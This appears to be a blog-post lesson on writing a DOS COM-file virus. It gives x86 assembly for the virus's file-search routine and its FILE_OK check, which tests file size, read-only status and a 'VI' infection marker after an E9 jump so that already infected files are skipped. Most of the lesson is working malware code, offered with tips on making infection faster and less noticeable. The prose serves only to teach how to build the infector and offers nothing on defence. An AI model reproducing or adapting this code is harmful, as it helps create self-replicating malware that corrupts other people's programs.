HACKING LESSON 16

If our search mechanism as a whole also uses the z flag to tell the main controlling program that it has found a file to infect (z=file found, nz=no file found) then our completed search function can be written like this:

FIND_FILE:
mov dx,OFFSET COMFILE
mov al,00000110B
mov ah,4EH ;perform search first
int 21H

FF_LOOP:
or al,al ;any possibilities found?
jnz FF_DONE ;no - exit with z reset
call FILE_OK ;yes, go check if we can infect it
jz FF_DONE ;yes - exit with z set
mov ah,4FH ;no - search for another file
int 21H
jmp FF_LOOP ;go back up and see what happened

FF_DONE:
ret ;return to main virus control routine

Study this search routine carefully. If it tells the virus to infect a program which does not have room for the virus, then the newly infected program may be inadvertently ruined. A good FILE_OK routine must perform two checks:

(1) It must check a file to see if it is too long to attach the virus to, and
(2) It must check to see if the virus is already there. If the file is short enough, and the virus is not present, FILE_OK should return a “go ahead” to the search routine.

On entry to FILE_OK, the search function has set up the DTA with 43 bytes of information about the file to check, including its size and its name. Suppose that we have defined two labels, FSIZE and FNAME in the DTA to access the file size and file name respectively. Then checking the file size to see if the virus will fit is a simple matter. Since the file size of a COM file is always less than 64 kilobytes, we may load the size of the file we want to infect into the ax register:

mov ax,WORD PTR [FSIZE]

Next we add the number of bytes the virus will have to add to this file, plus 100H. The 100H is needed because DOS will also allocate room for the PSP, and load the program file at offset 100H. To determine the number of bytes the virus will need automatically, we simply put a label VIRUS at the start of the virus code we are writing and a label END_VIRUS at the end of it, and take the difference. If we add these bytes to ax, and ax overflows, then the file which the search routine has found is too large to permit a successful infection. An overflow will cause the carry flag c to be set, so the file size check will look something like this:

FILE_OK:
mov ax,WORD PTR [FSIZE]
add ax,OFFSET END_VIRUS - OFFSET VIRUS + 100H
jc BAD_FILE
..
GOOD_FILE:
xor al,al
ret

BAD_FILE:
mov al,1
or al,al
ret

The next problem that the FILE_OK routine must deal with is how to avoid infecting a file that has already been infected. This can only be accomplished if the virus has some understanding of how it goes about infecting a file. We have replaced the first few bytes of the host program with a jump to the viral code. Thus, the FILE_OK procedure can go out and read the file which is a candidate for infection to determine whether its first instruction is a jump. If it isn’t, then the virus obviously has not infected that file yet. There are two kinds of jump instructions which might be encountered in a COM file, known as a near jump and a short jump. The virus we create here will always use a near jump to gain control when the program starts. Since a short jump only has a range of 128 bytes, we could not use it to infect a COM file larger than 128 bytes. The near jump allows a range of 64 kilobytes. Thus it can always be used to jump from the beginning of a COM file to the virus, at the end of the program, no matter how big the COM file is (as long as it is really a valid COM file). A near jump is represented in machine language with the byte E9 Hex, followed by two bytes which tell the CPU how far to jump.

Thus, our first test to see if infection has already occurred is to check to see if the first byte in the file is E9 Hex. If it is anything else, the virus is clear to go ahead and infect. Looking for E9 Hex is not enough though. Many COM files are designed so the first instruction is a jump to begin with. Thus the virus may encounter files which start with an E9 Hex even though they have never been infected. The virus cannot assume that a file has been infected just because it starts with an E9. It must go farther. It must have a way of telling whether a file has been infected even when it does start with E9. If we do not incorporate this extra step into the FILE_OK routine, the virus will pass by many good COM files which it could infect because it thinks they have already been infected. While failure to incorporate such a feature into FILE_OK will not cause the virus to fail, it will limit its functionality.

One way to make this test simple and yet very reliable is to change a couple more bytes than necessary at the beginning of the host program. The near jump will require three bytes, so we might take two more, and encode them in a unique way so the virus can be pretty sure the file is infected if those bytes are properly encoded. The simplest scheme is to just set them to some fixed value. We’ll use the two characters “VI” here. Thus, when a file begins with a near jump followed by the bytes “V”=56H and “I”=49H, we can be almost positive that the virus is there, and otherwise it is not. To read the first five bytes of the file, we open it with DOS Interrupt 21H function 3D Hex. This function requires us to set ds:dx to point to the file name (FNAME) and to specify the access rights which we desire in the al register. In the FILE_OK routine the virus only needs to read the file. Yet there we will try to open it with read/write access, rather than read-only access. If the file attribute is set to read-only, an attempt to open in read/write mode will result in an error (which DOS signals by setting the carry flag on return from INT 21H). This will allow the virus to detect read-only files and avoid them, since the virus must write to a file to infect it. It is much better to find out that the file is read-only here, in the search routine, than to assume the file is good to infect and then have the virus fail when it actually attempts infection. Thus, when opening the file, we set al = 2 to tell DOS to open it in read/write mode. If DOS opens the file successfully, it returns a filehandle in ax. This is just a number which DOS uses to refer to the file in all future requests. The code to open the file looks like this:

mov ax,3D02H
mov dx,OFFSET FNAME
int 21H
jc BAD_FILE

Once the file is open, the virus may perform the actual read operation, DOS function 3F Hex. To read a file, one must set bx equal to the file handle number and cx to the number of bytes to read from the file. Also ds:dx must be set to the location in memory where the data read from the file should be stored (which we will call START_IMAGE). DOS stores an internal file pointer for each open file which keeps track of where in the file DOS is going to do its reading and writing from. The file pointer is just a four byte long integer, which specifies which byte in the selected file a read or write operation refers to. This file pointer starts out pointing to the first byte in the file (file pointer = 0), and it is automatically advanced by DOS as the file is read from or written to. Since it starts at the beginning of the file, and the FILE_OK procedure must read the first five bytes of the file, there is no need to touch the file pointer right now. However, you should be aware that it is there, hidden away by DOS. It is an essential part of any file reading and writing we may want to do. When it comes time for the virus to infect the file, it will have to modify this file pointer to grab a few bytes here and put them there, etc. Doing that is much faster (and hence, less noticeable) than reading a whole file into memory, manipulating it in memory, and then writing it back to disk. For now, though, the actual reading of the file is fairly simple. It looks like this:

mov bx,ax ;put handle in bx
mov cx,5 ;prepare to read 5 bytes
mov dx,OFFSET START_IMAGE ;to START_IMAGE
mov ah,3FH
int 21H ;go do it

We will not worry about the possibility of an error in reading five bytes here. The only possible error is that the file is not long enough to read five bytes, and we are pretty safe in assuming that most COM files will have more than four bytes in them. Finally, to close the file, we use DOS function 3E Hex and put the file handle in bx. Putting it all together, the FILE_OK procedure looks like this:

FILE_OK:
mov dx,OFFSET FNAME ;first open the file
mov ax,3D02H ;r/w access open file
int 21H
jc FOK_NZEND ;error opening file - file can’t be used
mov bx,ax ;put file handle in bx
push bx ;and save it on the stack
mov cx,5 ;read 5 bytes at the start of the program
mov dx,OFFSET START_IMAGE ;and store them here
mov ah,3FH ;DOS read function
int 21H
pop bx ;restore the file handle
mov ah,3EH
int 21H ;and close the file
mov ax,WORD PTR [FSIZE] ;get the file size of the host
add ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add size of virus to it
jc FOK_NZEND ;c set if ax overflows (size > 64k)
cmp BYTE PTR [START_IMAGE],0E9H ;size ok-is first byte a near jmp?
jnz FOK_ZEND ;not near jmp, file must be ok, exit with z
cmp WORD PTR [START_IMAGE+3],4956H ;ok, is ’VI’ in positions 3 & 4?
jnz FOK_ZEND ;no, file can be infected, return with Z set

FOK_NZEND:
mov al,1 ;we’d better not infect this file
or al,al ;so return with z reset
ret

FOK_ZEND:
xor al,al ;ok to infect, return with z set
ret

This completes our discussion of the search mechanism for the virus.

No comments: